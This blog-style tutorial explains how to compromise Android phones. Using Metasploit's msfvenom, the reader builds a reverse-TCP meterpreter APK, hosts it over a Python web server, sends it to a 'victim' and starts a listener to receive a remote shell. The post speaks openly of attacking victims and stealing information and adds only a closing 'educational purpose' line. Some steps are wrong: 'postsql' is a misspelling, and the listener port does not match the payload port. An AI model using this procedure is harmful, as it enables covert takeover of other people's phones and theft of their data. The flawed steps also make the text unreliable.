Hacking android using Virus with PC

 Hacking android using Virus with PC



Hello, today we are going to use virus to hack android devices. We are going to use tool named as Metasploit to hack android devices.


What is Metasploit ?

Metasploit is a tool that is developed by HD moore in the year 2003 and now it is maintained by Rapid7. Metasploit is an open source this is used by cyber security experts and Cybercriminals to find exploit in Targeted victim's device. This tool is mainly used by Cyber security experts for Performing penetration testing and vulnerability assessment. But this tool is also used by cyber criminals to steal sensitive information and perform various attacks on victim's device.

Metasploit have a large community of user's and developer's who contribute to it's development constantly and also they add new module and exploit to make this tool more functionable. Metasploit can create payload. Payload is just like virus, You can create payload for various platforms such as Android, Mac, Linux. Metasploit also have Auxiliary useful to perform Port scanning, Vulnerability scanning and etc. IT also have encoders To protect your app from Anti-Virus.

This tool have a range of tools for testing Targeted system -

Payload Generators: This tool can create payload to Perform attacks like Stealing information, Installing backdoor, Taking control of system and so on.

Database for exploit: It haves a large collection of exploits which helps it to attack on system by various ways.

Modules: Module consist of collection of tools and scripts that is useful for automate the tasks.

MeterPreter: It is an interactive shell that is used to perform various tasks on victim's system.

Now we are going to create Payload for Android:
It is pre-installed in Linux system to check it

msfvenom -h

msfvenom is a Standalone payload generator and -h use shows the list of various commands.

We are going to perform this attack on LAN (Local Area Network)

msfvenom -p android/meterpreter/reverse_tcp lhost= (your local ip) lport=4444 > (name of apk)

-p - to create a payload.

android - the platform. (you can type any platform you want)

meterpreter - part of payload, It provides you a multi-functional shell.

reverse_tcp - used to create reverse tcp payload. 

lhost - the local IP, type ifconfig for get your local IP address (in my case it 10.0.2.15)

lport - give any local port number

> - after this symbol give the name of app ( I give Payload.apk)

After pressing enter it create an apk contain reverse_tcp Payload. Now send that apk to the victim, Whenever our victim executes this apk. Send it by creating link or other way. To host this smiply type
 
python3 -m http.server 8080

It works as provide a server you can directly send it to your victim's device. like

http://10.0.2.15:8080/Payload.apk 
 
It automatic start to download apk download. Install it on victim device. Then you need to start listener for that stop that server we start using Ctrl+c. 
Now start the listener using

sudo service postsql start

To start metasploit use
 msfconsole

After it started create listener by typing
use exploit/multi/handler

It changes the path now create the payload using 
set payload android/meterpreter/reverse_tcp

Then set the lhost and lport
set lhost 10.0.2.15

set lport 8080

Now type 
run 
to start reverse TCP handler 

We are going to cover Commands in our next blog

This Post is just for educational purpose!

Hope this post will help you to know more about Hacking using Android!

Thank You…!!!!!!





No comments:

Post a Comment

Pages